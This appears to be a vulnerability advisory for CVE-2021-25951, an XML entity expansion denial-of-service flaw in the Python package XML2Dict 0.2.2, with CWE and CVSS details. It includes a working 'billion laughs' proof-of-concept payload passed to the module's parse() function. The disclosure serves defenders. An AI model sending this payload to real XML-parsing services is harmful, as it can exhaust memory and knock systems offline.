icon

We found results for “

CVE-2021-25951

Date: June 30, 2021

Overview

XXE vulnerability in 'XML2Dict ' version 0.2.2 allows attacker to cause a denial of service.

Details

The PyPi module 'XML2Dict ' is vulnerable to XML Entity Expansion vulnerability as the function `parse()` does not restrict recursive entity references in DTDs in a specially crafted XML document. Due to this flaw an attacker could load a file which is defines multiple entities recursively thus causing denial-of-service.

PoC Details

The function `parse()` accepts an XML file as input and converts it to JSON. As the function does not properly control the number of recursive definitions of entities, this can lead to explosive growth of data when parsed, causing a denial of service.

PoC Code

from encoder import XML2Dict

xml2dic = XML2Dict()

doc = """ <!--?xml version="1.0" ?--> <!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz> """

xml2dic.parse(doc)

Affected Environments

0.2.2

Prevention

No fix version

Language: Python

Good to know:

icon
icon

Improper Restriction of XML External Entity Reference ('XXE')

CWE-611

Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')

CWE-776
icon

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): None
Integrity (I): None
Availability (A): High
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Low
Authentication (AU): None
Confidentiality (C): None
Integrity (I): None
Availability (A): Partial
Additional information: